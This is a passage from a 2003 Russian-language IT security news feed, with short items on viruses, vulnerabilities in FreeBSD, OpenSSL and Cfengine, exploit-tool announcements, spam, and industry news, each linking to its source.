указывают на google.com», — говорит он. Подробнее - http://www.zdnet.ru/?ID=307481
4/10/2003 13:39 В интернете появился фальшивый сайт Генеральной прокуратуры России.
Генеральная прокуратура Российской Федерации проводит расследование по факту открытия собственного фальшивого интернет-сайта, сообщает ежедневное издание "Газета". По словам официальных представителей Генпрокуратуры, веб-страница, расположенная по адресу www.gprf.info, не имеет никакого отношения к ведомству на Большой Дмитровке. Информация о якобы открывшемся официальном сайте Генеральной прокуратуры на поддельных бланках была разослана в ряд СМИ 1 октября. "Мы надеемся, что появление сайта послужит делу повышения информационной открытости, прозрачности, построения в России полноценного гражданского общества, а также позволит всем заинтересованным лицам оперативно получать правдивую информацию из первых рук. Открытие официального электронного представительства Генпрокуратуры в Интернете является важным шагом в деле повышения информированности граждан о деятельности, целях и задачах Генпрокуратуры, ее роли в современном российском обществе. Особый интерес представляют интерактивные разделы, при помощи которых граждане могут напрямую задать вопрос о деятельности ведомства, а также сообщить любую информацию, которая может быть полезной в его работе, и узнать о других возможных вариантах сотрудничества", - говорилось в тексте заявления для прессы. Лжесайт содержит разделы "Новости", "История", "Структура и функции". В разделе "Контакты" пользователи могут найти список координат руководителей Генпрокуратуры. Создатели ресурса пообещали в ближайшее время открыть его англоязычную версию Подробнее - http://www.gzt.ru/rub.gzt?rubric=novosti...
4/10/2003 13:17 AOL предоставил новые фильтры спама.
Компания America Online представила пользователями своего веб-клиента AOL 8.0 Plus новый фильтр спама, сообщает MacCentral. Новые версии фильтров спама для пользователей других версий клиента (AOL 8.0, AOL 7.0, AOL 6.0 и AOL для Mac OS X) ожидаются в ближайшем будущем. Новые фильтры будут поставляться пользователям в автоматическом режиме, и по мнению Дэвида Гэнга, вице-президента AOL, установившие их пользователи довольно быстро заметят результат - количество нежелательных писем в их ящиках заметно сократится. Ранее подобные фильтры были доступны только пользователям клиента AOL 9.0 Optimized. Эти фильтры способны "обучаться" и приспосабливаться под развивающуюся технологию рассылки спама. Фильтры не требуют дополнительного программного обеспечения и лишних усилий по их установке. Подробности - http://maccentral.macworld.com/news/2003/09/30/aol/
4/10/2003 12:10 Microsoft выпустила SharePoint Services для Windows Server 2003.
Компания Microsoft выпустила окончательную версию пакета Windows SharePoint Services для ОС Windows Server 2003. С его помощью в корпоративных сетях можно будет организовывать специальные сайты, предназначенные для обмена файлами и документами, а также для совместной работы с ними. Доступ к сайтам может при этом осуществляться из программ пакета Microsoft Office. SharePoint Services позволяет отслеживать изменение версий документов, учитывать, кто и когда запрашивал тот или иной файл и т.п. Windows SharePoint Services является бесплатным дополнением к Windows Server 2003. Подробности - http://www.microsoft.com/windowsserver2003/technologies/sharepoint/default.mspx
3/10/2003 15:27 Уязвимость в ядре FreeBSD.
Как сообщает Joost Pol из Pine Digital Security, в процессе аудита ядра ОС FreeBSD была обнаружена уязвимость в оном. И-за отсутствия системного вызова fdrop() внутри системного вызова readv(2) в коде ядра существует возможность переполнения счётчика ссылок файловой структуры (int f_count). При любых файловых операциях ядро FreeBSD открывает соответствующую файловую структуру, определённую в хидер - файле sys/file.h. При этом для учёта взаимодействия внутри файловой структуры ведётся счётчик обращений (ссылок) на членов этоой структуры. При обращении к любому из этих членов счётчик увеличивается при помощи системного вызова fhold(), уменьшение счётчика происходит путём вызова функции fdrop()(обе определены в sys/file.h). Например, при открытии файла (open(2)) происходит увеличение счётчика, а при закрытии (close(2)) - уменьшение. Таким образом, при отсутствии системного вызова fdrop() внутри readv(2), локальный пользователь может вызвать переполнение счётчика, что, в итоге, может привести либо к повышению привилегий в системе, либо к типичной ситуации DoS. Уязвимость присутствует в ветке RELENG_4.X для версий ОС >=4.3 и отсутствует в версиях RELENG_5.X. Патчи выпущены, CVS-репозитарий обновлён. Подробности - http://www.pine.nl/press/pine-cert-20030901.txt
3/10/2003 13:10 Microsoft: одних патчей мало.
Признав, что стратегия латания дыр в Windows в ее современном виде не работает, Microsoft, как сообщил CNET News.com один из руководителей компании, планирует представить на будущей неделе новую схему обеспечения безопасности, ориентированную на то, что компания называет «защитой по периметру». Microsoft будет продолжать поиск способов совершенствования средств установки пользователями обновлений для Windows, или патчей, однако компания поняла, что слишком много заказчиков не устанавливает апгрейды достаточно быстро, чтобы противостоять хакерам. «С одной стороны, было наивно думать, что все заказчики будут устанавливать патчи, — говорит бывший директор по продажам Microsoft Орландо Айала, который теперь возглавляет отдел продаж малым и средним компаниям. — Это просто довольно трудно». До сих пор усилия Microsoft были сосредоточены главным образом на совершенствовании подхода к написанию кода и последующему исправлению ошибок по мере их обнаружения. «Стратегия безопасности в основном базировалась на работе с поправками», — констатировал Айала в среду в интервью по телефону. Однако недавние атаки червей и вирусов в очередной раз подтвердили, что многие заказчики остаются уязвимы еще долго после выхода патчей. Источник - http://www.zdnet.ru
3/10/2003 12:35 О троянце Hatoy.
Бесплатный онлайновый антивирус Panda ActiveScan зафиксировал значительное увеличение числа компьютеров, зараженных троянцем Hatoy (Trj/Hatoy.A)/ Этот троянец впервые был обнаружен Вирусной Лабораторией PandaLabs несколько дней тому назад. Он изменяет на компьютерах настройки TCP/IP таким образом, что обращение передается на иной DNS сервер, нежели в начальных параметрах. По этой причине основным действием Hatoy является перенаправление пользователей на различные сайты, определяемые автором вируса, при их попытках открыть какую-либо веб страницу. Hatoy не способен распространяться самостоятельно, поэтому единственным способом заражения является посещение пользователем веб страниц, созданных с целью использования бреши Object Type, содержащейся в браузере Microsoft Internet Explorer. Эта ошибка в системе защиты браузера позволяет автоматически запускать файлы, содержащиеся на упомянутых страницах. В результате, если пользователь посещает веб страницу, созданную с целью загрузки и запуска Hatoy, то его компьютер мгновенно заражается. После попадания на компьютер троянец изменяет реестр Windows и создает некоторые файлы. Способ распространения, используемый данным вредоносным кодом, дает основания полагать, что адрес веб страницы с вирусом был разослан как спам. Это объясняет, почему количество заражений данным вредоносным кодом возросло так резко через несколько дней после его появления. Источник - http://www.viruslab.ru
3/10/2003 12:09 Десять самых активных вирусов сентября.
На этот раз представлена десятка самых активных вирусов сентября от Panda Software. По данным, собранным бесплатным онлайновым антивирусом Panda Active Scan, в сентябре причиной наибольшего числа заражений вновь стал Bugbear.B. Этот червь заразил 5,1 % от общего количества компьютеров, на которых Panda Active Scan нашел вирусы. Доминирующее положение Bugbear.B может быть объяснено его способностью к массовой саморассылке и тем, что с целью распространения он использует брешь в Internet Explorer. Сразу за Bugbear.B идет червь Blaster, ставший причиной широкомасштабной эпидемии в августе. На его счету находится чуть меньше 5 % происшествий. Тот факт, что Blaster распространяется непосредственно через Интернет и использует брешь Windows RPC DCOM, и позволяет ему заражать незащищенные компьютеры. Третье место занимает червь Sobig.F, который, распространяясь быстрее остальных, все же не сумел вызвать масштабных заражений. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=194
3/10/2003 11:46 Вирусная атака лишила оперативности электронную почту ЮАР.
Южноафриканская компания Telkom, предоставляющая электронные почтовые услуги, дала ответ на многочисленные жалобы клиентов, недовольных резким снижением скорости доставки писем. По словам многих пользователей Telkom, в течение последних двух недель время доставки писем достигало порой четырех часов, сообщает сайт газеты Sunday Times. Столь неприятное явление в Telkom объяснили значительным увеличением числа писем, зараженных компьютерными вирусами. "Telkom предоставляет бесплатную проверку писем на наличие вредоносных программ. Каждое зараженное письмо предусматривает отправку двух дополнительных сообщений: отправителю и адресату. Это создает значительное увеличение потока писем и приводит к возникновению значительных задержек в доставке", - рассказал руководитель группы корпоративных коммуникаций Telkom Ханс ван Гронендаал (Hans van de Groenendaal). По словам ван Гронендаала вирусной атаке подверглись практически все южноафриканские интернет-провайдеры, предоставляющие бесплатную антивирусную проверку электронной почты. Подробности - http://www.sundaytimes.co.za/business/technology/Tech1.asp
3/10/2003 10:40 Норвежские энергетики ведут неустанную борьбу с хакерами.
Энергетическая система Норвегии регулярно подвергается хакерским атакам, подавляющая часть которых оказывается неудачной. Об этом заявили представители двух крупнейших энергетических компаний страны Statkraft и Statnett, сообщает сайт газеты Aftenposten. По словам энергетиков, они сумели обеспечить надежную защиту от деятельности хакеров, пытающихся лишить электричества целые районы Норвегии. При этом в Statkraft и Statnett признают, что не располагают сведениями о том, с кем именно им приходиться бороться в сфере компьютерной безопасности. В случае если хакерам удастся провести удачную атаку на энергосистему Осло, столица лишится не только транспортного сообщения, но и мобильной связи, и уличного освещения. Обеспечивать жизнедеятельность правительственных учреждений, больниц и главного аэропорта Гардермоэн будут автономные генераторы. Источник - http://www.viruslist.ru
2/10/2003 22:04 SuSE Linux 9.0 выйдет в конце октября.
В SuSE Linux 9.0, выход которого запланирован на 24 октября, появится поддержка архитектуры AMD64 и будет упрощена совместная работа с Microsoft Windows (за счет улучшенной поддержки NTFS), сообщил Холгер Дриофф (Holger Dryoff), генеральный менеджер североамериканского представительства SuSE. Дистрибутив будет базироваться на ядре 2.4.21 и включать в себя тестовую версию ядра 2.6. Цены на SuSE Linux 9.0 колеблются от 40 до 120 долларов США, в зависимости от редакции. Подробности - http://zdnet.com.com/2100-1104_2-5083858.html?tag=zdnnfd.main
2/10/2003 21:51 Сканер уязвимости в базах данных.
Господин visigoth из Security Centric Labs анонсировал выход нового сканера уязвимости в базах данных (DB security scanner) под названием MetaCoretex. Сканер поставляется в исходниках и написан на Java. Конфигурационные файлы и файлы отчёта ведутся в XML. Ввиду использования Джавы в качестве языка, на котором написан сканер, он является платформенно-независимым и (теоретически) должен работать на любой платформе. Подробности - http://www.metacoretex.com
2/10/2003 21:45 Статья "Сканирование портов: За и Против".
На сайте securitylab.ru в разделе аналитика опубликована очень интересная статья, посвящённая мнению различных аналитиков и людей, достаточно близких к Интернет-безопасности на вопрос о том, насколько законно (или незаконно) сканирование портов. Вопрос сканирования (и реакции на него) довольно часто возникает в различных форумах, посвящённых системному администрированию (поскольку СИСАДМИНы в силу специфики их работы сталкиваются с этим чаще остальных "пользователей" компьютеров) - поэтому мнение людей, мнение которых было приведено в статье наверняка будет небезинтересно. В качестве цитаты - высказывание господина Касперского: "Администратор, по нашему мнению, в современных условиях - вообще не должен реагировать на подобные вещи. Его задача - защита системы. Можно конечно не следить за обновлениями продуктов, не ставить патчи, не консультировать пользователей, а просто сидеть и злобно кидаться на любого, кто попробует обратиться (а сканирование - это именно обращение) к любым портам в системе, писать гневные письма другим администраторам, искать виноватых. А можно просто закрыть ненужные/опасные порты". Остальное можно узнать из статьи. Статья - http://www.securitylab.ru/40572.html
2/10/2003 21:32 Программа из одной строчки на Perl.
В форуме Development на сайте linux.org.ru обнаружена довольно интересная (и, главное, поучительная) нитка о довольно интересной программе на Перл, состоящей всего из одной строки, которая, тем не менее (что типично для Перл-скриптов) выполняет довольно "интересные" действия в ОС (Linux, FreeBSD, cygwin в Windows). Рекомендую посмотреть. :) Подробнее - http://www.linux.org.ru/view-message.jsp?msgid=392747
2/10/2003 21:09 Спецслужбы США разворачивают атаку на украинских компьютерных пиратов.
Украинец Максим Ковальчук, арестованный в мае этого года в Таиланде по обвинению в продаже через интернет пиратского программного обеспечения, оказался ключевой фигурой пиратской сети, совершавшей различного рода преступления в сфере информационных технологий. В настоящее время он ожидает решения суда по вопросу об экстрадиции в США. Арест Ковальчука был произведен тайскими властями по запросу США, уголовное дело было заведено в американском штате Калифорния. Согласно сведениям информационной компании MSNBC, в случае экстрадиции Ковальчука он предстанет в США перед судом, так как программное обеспечение, которое он нелегально продавал, в основном американского производства. Как пишет MSNBC, Ковальчук - 25-летний уроженец города Тернополь - с помощью сложных схем организовывал продажу взломанных копий программ ведущих американских производителей и встраивал в них программы для получения доступа к компьютерам покупателей, а также занимался другими видами электронного мошенничества. MSNBC особо отмечает, что информация по делу Ковальчука держится американскими спецслужбами в секрете, так как они рассчитывают выйти на его пособников. Источник - http://www.lenta.ru
2/10/2003 20:22 Активность хакеров и вирусописателей возросла на 20 процентов по сравнению с предыдущим годом.
Количество вирусных инцидентов и хакерских атак в первые шесть месяцев этого года возросло на 20 процентов по сравнению с аналогичным периодом прошлого года, сообщает BBC. Согласно результатам исследования, проведенного специалистами антивирусной компании Symantec, хакеры научились значительно быстрее обнаруживать бреши в программном обеспечении. Одной из самых серьезных опасностей для пользователей эксперты считают рост числа так называемых "смешанных угроз", комбинирующих недостатки программного обеспечения с вредоносными кодами. Для компаний, подвергающихся в среднем 38 кибератакам в неделю, ликвидация брешей является критичным условием выживаемости. "С каждым годом мы наблюдаем небольшой рост числа брешей, имеющих большое значение для пользователей. В то же время у пользователей возникают сложности со своевременной ликвидацией этих брешей. Еще большее значение имеет скорость, с которой организуются хакерские атаки", - прокомментировали тенденции в сфере компьютерной безопасности в Symantec. Подробности - http://news.bbc.co.uk/2/hi/technology/3154806.stm
2/10/2003 20:17 Бюллетень CERT об уязвимости в OpenSSL.
Мы уже сообщали об уязвимости в популярной в мире открытых систем программе организации закрытого канала обмена данными через Интернет OpenSSL. Многие производители дистрибутивов выпустили обновления своих реализаций OpenSSL. Вчера был выпущен бюллетень CERT CA-2003-26, который подробно описывает уязвимость и приводит ссылки на обновления пакета OpenSSL для различных дистрибутивов ОС. Бюллетень - http://www.cert.org/advisories/CA-2003-26.html
2/10/2003 19:11 Вирусная двадцатка месяца.
"Лаюоратория Касперского" выпустила очередной хит-парад вирусов прошедшего месяца. Как следует из списка рассылки, на первом месте уверенно лидирует пресловутый Sobig во всех его ипостасях (G, F etc.) - 47.75%, на втором месте появившийся в этом месяце новичок Swen - 36,50%, на третьем со значительным отставанием Mimail - 6,50%, на 4-м - поднявшийся на одно место (и по прежнему использующий давно залатанную MS уязвимость в тэге IFRAME) Klez. Источник - http://www.kaspersky.ru
2/10/2003 19:01 ФБР обвинило специалиста по PR в незаконном проникновении в сети армии США.
Федеральное бюро расследований США задержало 36-летнего Бретта Эдварда О'Киф (Brett Edward O'Keefe), подозреваемого в попытке незаконного проникновения в компьютерные сети военного ведомства и частных пользователей, сообщает Associated Press. По словам обвинителей, используя незаконно добытую информацию, О'Кифи планировал улучшить свое материальное положение. Текст обвинительного заключения состоит из шести пунктов. В частности, задержанному инкриминируется предоставление средствам массовой информации сведений военного характера и создания таким образом дополнительного интереса к компании ForensicTec Solutions Inc., президентом которой он был. Клиентами ForensicTec Solutions Inc. помимо армии и флота являются NASA, Министерство энергетики США и национальные институты здравоохранения. ForensicTec Solutions Inc. стала объектом внимания со стороны ФБР, после того, как газета The Washington Post опубликовала информацию о недостатках в системе безопасности сетей военного ведомства. Сведения об этих недостатках журналистам предоставил О'Кифи. С помощью бесплатной программы он выявлял уязвимые компьютеры и получал доступ к хранящимся на них файлам, зачастую содержавшим конфиденциальную информацию. Хакер отметил, что намеревался лишь привлечь внимание общественности к недостаткам в системе безопасности компьютерных сетей военного ведомства. Источник - http://www.viruslist.com
2/10/2003 18:44 Приносим извинения за неполадки в работе сервера.
Команда UINC приносит свои извинения за неполадки в работе сервера, который был недоступен в течение 2-х дней. На настоящий момент (кажется) неполадки устранены. Надеемся, что в будущем сервер будет работать беотказно. Источник - мы
30/09/2003 22:40 На сайте новый документ: Применение криптографии в вопросах защиты данных, на примере рюкзачной системы шифрования.
Цель этой работы - решение проблемы безопасности при работе с удаленными данными. Предотвращаются два основных вида угроз безопасности - это угроза раскрытия и угроза целостности информации. В качестве основного средства ограничивающего доступ к конфиденциальной информации был использован метод хранения информации в закодированном виде. Кодирование осуществляется при помощи рюкзачной системы шифрования. Ознакомиться: http://www.uinc.ru/articles/42/index.shtml
30/09/2003 17:58 Уязвимость в OpenSSL.
Mark J. Cox из команды разработчиков проекта OpenSSL сообщает о наличии уязвимости в ПО OpenSSL. Уязвимость связана с некорректной обработкой специальным образом сформированных SSL/TLS - запросах закодированных по ASN.1. Подпрограмма, разбиающая соответствующие запросы из-за выхода за границы выделяемой памяти может вызвать повреждения стека с последующей его перезаписью. Таким образом может быть быть вызван типичный отказ в обслуживании службы, работающий с SSL с использованием реализации OpenSSL. Cам автор замечает, что уязвимость не присутствует в версиях OpenSSL 0.9.6 и не обнаружена возможность выполнения произвольного кода в системе. Кроме этой уязвимости обнаружены ещё три сопутствующие уязвимости - одна из них связана с обработкой тэга ASN.1, вторая - с обработкой некорректного публичного ключа, третья - представляет собой суммарную уязвимость, связанную с обработкой пользовательских сертификатов. Выпущены версии OpenSSL 0.9.7c и 0.9.6k. Рекомендуется обновить всё статически собранное ПО. BTW, RedHat уже отстрелялись обновлением (смею заметить - одни из первых). Хотелось бы заметить, что прошедший сентябрь выдался довольно "урожайным" месяцем в части уязвимостей в открытых системах - вспомним дыры в сендмейле, OpenSSH, OpenSSL (это не считая ProFTPD и остального прикладного ПО). Подробности - http://www.securityfocus.com/archive/1/339623/2003-09-27/2003-10-03/0
30/09/2003 14:22 Карманный RAR.
Одна из популярнейших программ-архиваторов для настольных компьютеров WinRAR стала доступна и на КПК под управлением Pocket PC. Компания RARLAB, разработчик этого алгоритма и соответствующей «оболочки», выпустила карманный вариант утилиты - PocketRAR. Функциональные возможности бета-версии, практически не отличаются от «старшего брата». Программа позволяет полноценно работать как с RAR, так и ZIP архивами, выбирать степень сжатия, закрывать файлы паролем и создавать многотомные архивы. Сжимать можно отдельные файлы, группы, а также целые каталоги с сохранением внутренней структуры. В настройках также есть возможность назначить PocketRAR программой для открытия архивов по умолчанию. Архиватор распространяется абсолютно бесплатно. Источник - http://www.mobile-review.com
30/09/2003 13:49 В США создан новый антихакерский центр.
В борьбе с компьютерными взломщиками американское правительство не жалеет ни денег, ни сил. Новым антихакерским оплотом стал National Center for Supercomputing Applications, построенный в институтском городке Urbana-Champaing Университета Иллинойс. Только на первом этапе Office of Naval Research выделил на новый проект 5,7 миллионов долларов. NCSA напичкан всевозможной аппаратурой и компьютерами; в его стенах работают лучшие умы Америки, а сердцем является мощный мейнфрейм. Отличие центра от многих подобных организаций - в его целях. Основное направление тут - разработка средств противостояния хакерам и внедрение своих собственных методов ведения сетевого боя. Впрочем, кусать локти от страха стоит далеко не всем взломщикам. До рядовых дефейсеров NCSA нет никакого дела - эту контору гораздо больше интересуют те, кто посягает на военные и правительственные структуры Америки. Центр стал как бы сетевой крышей для разных MILnet'ов. Наряду с главной миссией, NCSA будет также проводить срочные исследования в области хай-тек по заказу американского правительства. Источник - http://www.crime-research.org
30/09/2003 13:23 Китай открыл лабораторию по изучению кода Windows.
Китайские исследователи займутся доскональным изучением исходного кода операционной системы Microsoft на предмет ее безопасности. На прошлой неделе в Пекине открылась лаборатория по изучению исходного кода операционной системы Windows. Как сообщает газета People's Daily, лаборатория Source Code Browsing Lab вошла в состав существующей государственной организации «Китайский центр тестирования и сертификации продуктов защиты информации» (China Information Technology Security Certification Centre, CNITSEC). В статье говорится, что Microsoft стала первой коммерческой софтверной фирмой, подписавшей с китайским правительством соглашение об изучении исходного кода операционной системы: намек на то, что двери лаборатории открыты и для других софтверных компаний, желающих сертифицировать свои продукты на безопасность. В статье подчеркивается необходимость проверить исходный код Windows на наличие пробелов в защите, особенно в свете недавних хакерских атак. Однако в предыдущих статьях говорилось, что целью соглашения служит также поиск лазеек, оставленных разведывательными службами. Подробности - http://www.zdnet.ru/?ID=307284
30/09/2003 12:59 Взлом ПК с помощью кувалды.
Новость из разряда забавных. В Запорожье (Украина, если кто успел забыть) прошел очередной турнир в духе борьбы с компьютерными технологиями. В его ходе участники не только метали клавиатуры и пинали мышки, но и 'художественно ломали' компьютеры. "Первый открытый чемпионат по уничтожению компьютеров" был организован местной радиостанцией с целью напомнить молодым людям об опасности длительного общения с компьютерами. По информации ВВС Russian, чемпионат проводился в трех категориях - метание клавиатуры, удар ногой по компьютерной мыши и "творческое уничтожение" компьютерных мониторов. В последней категории довелось даже увидеть, как компьютеры давят автомобилем. Победители в каждой категории получали в качестве награды... новый ПК. В метании клавиатур победил с результатом 40,2 метра радиоинженер Евгений Гриценко. Подробнее - http://news.bbc.co.uk/hi/russian/life/newsid_3145000/3145284.stm
30/09/2003 12:37 "Кавказ-Центр" лишил ФСБ доступа на свой сайт (? :) ).
«Кавказ-Центр» сообщает, что (якобы) вычислил "хакера" (на него попутно списали и случившуюся неделю назад DOS-атаку) из-за его небрежности. Хакером оказалась ФСБ России (правильно - а чего мелочиться?). И это не просто голословное утверждение. У «Кавказ-Центра» есть техническое доказательство этого утверждения. Технические специалисты «Кавказ-Центра» блокировали семь подставных серверов, с которых осуществлялась атака на сервер. Однако атаки на сайт продолжились. И вот в пятницу в 14 часов 07 минут 06 сек по Джохарскому времени (Fri Sep 26 14:07:06 2003 по Вильнюсскому времени) технические специалисты «Кавказ-Центра» засекли очередную попытку атаки. Неизвестный киберпреступник, находящийся по адресу 213.24.76.8, просканировав порты сервера, приступил к очередной атаке. После блокирования атакующего IP, хакер использовал еще несколько адресов в диапазоне 213.24.76.0 - 213.24.77.255. Проведя несложную процедуру идентификации злоумышленников, специалисты сайта установили данные кибер-преступников (можете проверить - описано в NIC как сетка ФСБ). После тщательного изучения всех логов сервера, технические специалисты «Кавказ-Центра» так же установили, что первая атака на сервер 23 сентября была то же осуществлена с адреса 213.24.76.8 (ну а откуда же ещё? Только возникает вопрос - "А зачем было заморачиваться с покупкой серверов в США, о чём утверждалось в первом "послании"?). После точного установления злоумышленников, администрация «Кавказ-Центра» приняла решение лишить ФСБ России доступ на сайт «Кавказ-Центра», блокировав их IP-адреса 213.24.76.0 - 213.24.77.255. Теперь российской спецслужбе придется использовать нелегальные пути доступа на международный чеченский информационный сайт. Кроме того, руководство «Кавказ-Центра» рассматривает возможность подать в суд на ФСБ России в судебные органы Литвы (так как сервер физически находится на территории этой страны, и преступление было совершено на территории Литвы). Консультации с рядом литовских юристов уже начались. В общем (IMNSHO) ребята из расположенного в Литве Кавказа решили в очередной раз привлечь к себе внимание. Остальные выводы пусть каждй делает сам для себя из статьи, ссылка на которую приведена ниже. Кстати, если судить отвеетам Вэб-сервера (в той степени, насколько им можно доверять) - сервер стоит - Apache-AdvancedExtranetServer/1.3.27 (Mandrake Linux/8mdk) mod_gzip/1.3.26.1a. Just FYI. Подробности - http://www.kavkazcenter.com/russ/article.php?id=11160
30/09/2003 11:34 В будущем Red Hat будет встроенная защита от червей.
Как сообщает bugtraq.ru, в готовящемся к выходу Red Hat Enterprise Linux (RHEL) 3 появится технология под названием Position Independent Executables (PIE). С подробным изложением идеи, положенной в ее основу, хотя и в приложении к Windows, можно ознакомиться в статье, ссылка на которую приведена внизу. Суть ее заключается в изменении адреса загрузки приложений - в результате злобные черви (собственно говоря, и не только черви), которые, как правило, используют всевозможные переполнения буфера для заливки на сервер своего кода и ориентирующиеся на фиксированные адреса, останутся ни с чем. Следует уточнить, что использованному сервису легче от этого не станет, и в лучшем случае он просто аварийно завершится - но, по крайней мере, ваш сервер не превратится в новый источник заразы. Об PIE - http://www.bugtraq.ru/library/programming/rebasing.html Подробности - http://www.vnunet.com/News/1143925
30/09/2003 11:22 Предложение от "Лаборатории Касперского" для пользователей RAV.
"Лаборатория Касперского" объявила о начале специальной программы для пользователей антивирусной системы RAV (Reliable AntiVirus) по переходу на Антивирус Касперского. 10 июля 2003 г. технологии RAV были приобретены корпорацией Microsoft для интеграции в операционную систему Windows. Руководство GeCAD (Румыния), компании-разработчика RAV, уже объявило о "стратегической реорганизации", остановке продаж, поддержки продукта и, с сентября 2004 г., прекращении выпуска антивирусных обновлений. К сожалению, поглощение RAV имело ряд негативных последствий, вызванных неопределенностью сложившейся ситуации. В результате многие пользователи и дистрибуторы продукта выразили свое недовольство и были вынуждены обратиться к поиску альтернативных антивирусных решений. Для обеспечения бесперебойной защиты от вирусов компания предлагает специальную программу перехода на Антивирус Касперского®. В соответствии с условиями программы заказчики RAV имеют возможность приобрести равноценную версию Антивируса Касперского на следующий год с 50% скидкой, при этом вплоть до окончания лицензии RAV пользоваться продуктом бесплатно. Подробности акции - http://www.kaspersky.ru/news.html?id=143298292
30/09/2003 10:39 Буш подписал закон о запрете телефонного спама
Президент США в понедельник подписал закон о введении так называемых списков "телефонов, куда не надо звонить", ограждающих телефонных абонентов от предложений служб телемаркетинга, сообщает Associated Press. В списки абонентов, составленных по инициативе Федеральной комиссии по торговле (FTC), внесены около 50 миллионов человек. Закон о введении do-not-call списков был принят американским Конгрессом на прошлой неделе. Своего рода стимулом для принятия этого закона стали два судебных постановления, признавших запрет на предоставление информации о товарах и услугах телефонным абонентам нелигитимным. Таким образом, власти США сделали все возможное, чтобы составленные Федеральной комиссией по торговле списки оказались готовыми к использованию в назначенный ранее срок - то есть, 1 октября. К контролю за исполнением принятого закона присоединится и Федеральная комиссия по связи (FCC). По словам представителей этого ведомства, они намереваются штрафовать нарушителей принятого закона на 120 тысяч долларов за каждый звонок абонентам из списка FTC. Подробности - http://story.news.yahoo.com/news?tmpl=...
29/09/2003 20:06 Программа для разрушения SEH.
Бретт Мур из немецкой компании Security-Assessment.com, специализирующейся на безопасности компьютерных систем, опубликовал исходник win32-программы, позволяющей переписать SEH (Structured exception handling) - обработчика структурных исключений Windows. Как пишет сам автор, ранее им была опубликована возможность переписи SEH при помощи сообщений окон (windows messages) (для интересующихся - http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0059.html), затем Oliver Lavery описал подобную технику с использованием tab controls. На этот раз Бретт опубликовал код, позволяющий переписать SEH в приложениях, использующих прогресс-бар (progress bar). Код эксплоита (скорее всего) может быть полезен вирусописателям для получения шелла (либо закачки кода оного) в записываемые области памяти. Описание - http://www.securityfocus.com/archive/1/339457/2003-09-26/2003-10-02/0
29/09/2003 19:45 Инструмент для генерации XSS-эксплоитов.
Китаец LiuDieYu, известный обнаружением целого скопища уязвимости в популярном браузере Internet Explorer анонсировал выпуск инструмента под названием GenXE, основное назначение которого - генерация кода эксплоита для задания необходимого XSS (Cross-Site Scripting), в том числе и образец шелл-скрипта. Подробное описание - http://genxe.sourceforge.net/RELEASE_0.9.0/buttom_help.htm
29/09/2003 18:30 Эксплоит уязвимости в Cfengine.
Ранее Nick Cleaton сообщал об обнаружении уязвимости в популярном сетевом приложении в мире открытых систем Cfengine, позволяющем конфигурировать и централизованно настраивать большие компьютерные сети. Демон сервера открывает порт 5308 на мастер-сервере, с которым соединяются клиенты для считывания информации о возможных обновлениях в сетевой конфигурации. В результате переполнения буфера, обнаруженной автором, возникает возможность выполнения произвольного кода на сервере. Господин jsk из команды Ph4nt0m Security Team выпустил экплоит для ОС Linux, позволяющий удалённо получить шелл на сервере на порту 26112 с полномочиями суперпользователя. Исходник - http://ph4nt0m.net/projects/exp/PST_cfex.c
29/09/2003 18:06 Софтулийские Игры - 2003.
С 30 сентября по 3 октября на выставке "SoftTools" пройдут очные соревнования в области информационных технологий Софтулийские Игры. Участников ждут различные по тематике и сложности конкурсы, которые готовятся не специалистами по придумыванию олимпиадных задач, а реально работающими на рынке компьютерными компаниями. Поэтому ставятся вполне практические задачи. Их решение - хорошая возможность показать себя, проверить знания и заработать призы. Участие в Играх может принять любой - не существует ограничений по возрасту, профессиональной подготовке и т.п. Каждый день соревнований посвящен одной тематике. Среди заданий - создание трехмерных изображений, работа с операционной системой Linux, проектирование с помощью Autodesk Inventor. В последний день проведения соревнований, 3 октября, состоится торжественная церемония награждения. Подробности - http://www.sftgames.ru/
29/09/2003 17:52 SMS-спам: проблема каждого пятого российского абонента.
Недавно на владельцев мобильных телефонов обрушилась новая напасть - рассылка рекламы через текстовые SMS-сообщения. Однако в отличие от спама в Интернете с мобильным "мусором" пока бороться не умеют, а в России к тому же и не считают нужным. Чем же так привлекателен этот вид рекламы? Прежде всего простотой. Никто не станет вручную со своего мобильного телефона набирать текст сообщения для тысяч получателей. Для этого достаточно войти в интернет и с помощью несложной программки послать текст сообщения сколько угодно большому количеству абонентов. Уже давно не секрет, что диск с базой данных пользователей той или иной сотовой компании можно приобрести у компьютерных пиратов за 150-200 рублей. А шлюзом для рассылки чаще всего бывает интернет-сайт оператора сотовой связи. "Сегодня это самый недорогой и самый эффективный способ электронной рекламы, - рассказывает Егор Тихонов, один из тех, кого уже принято называть "спамером". - SMS-рассылки - это практически всегда стопроцентное попадание в цель. По статистике, на одного российского пользователя интернета приходится 4-5 почтовых ящиков, половина из которых этим самым пользователем давно забыта. Сообщение на мобильный телефон в 90% случаев найдет своего адресата. Кроме того, современные способы защиты от нежелательных интернет-рассылок фильтруют примерно половину поступающих сообщений, а сталкиваться с защитой от SMS-рассылок пока еще не приходилось". На самом деле электронный мир уже значительно продвинулся в борьбе со спамом в электронной почте. Практически каждую неделю на рынок выходит новая компьютерная программа, позволяющая блокировать потоки навязчивой рекламы. Также интернет-провайдеры и почтовые серверы, заботясь о своих пользователях, ставят мощнейшие средства защиты. Подробности - http://www.cnews.ru/newsline/index.shtml?2003/09/29/149233
29/09/2003 17:19 Microsoft открыла новое подразделение
Microsoft создаёт бизнес-подразделение по разработке пакетных решений для развертывания их в области телекоммуникаций и мобильных устройств. Подразделение по вопросам мобильных и телекоммуникационных решений (Communications and Mobile Solutions) будет заниматься продажами продуктов и услуг операторам мобильной и обычной связи, хостинг-провайдерам, а также компаниям, работающим в области развлечений и медиа. Microsoft собирается комбинировать свои продукты с продуктами и услугами своих бизнес-партнеров, а также с контентом медиа-парнеров, а первые результаты работы нового подразделения будут продемонстрированы в следующем месяце в Женеве на ITU Telecom World 2003. Подразделение Communications and Mobile Solutions является реорганизованным бизнес-подразделением Network Service Provider Solutions, а сфера развлечений была добавлена из-за того, что специалисты компании наблюдают пересечение этой области с областью телекоммуникаций в процессе развития и предложения сервисов. Источник - http://www.computerweekly.com/
29/09/2003 17:16 Выход электронного журнала "Спамтест" No. 17.
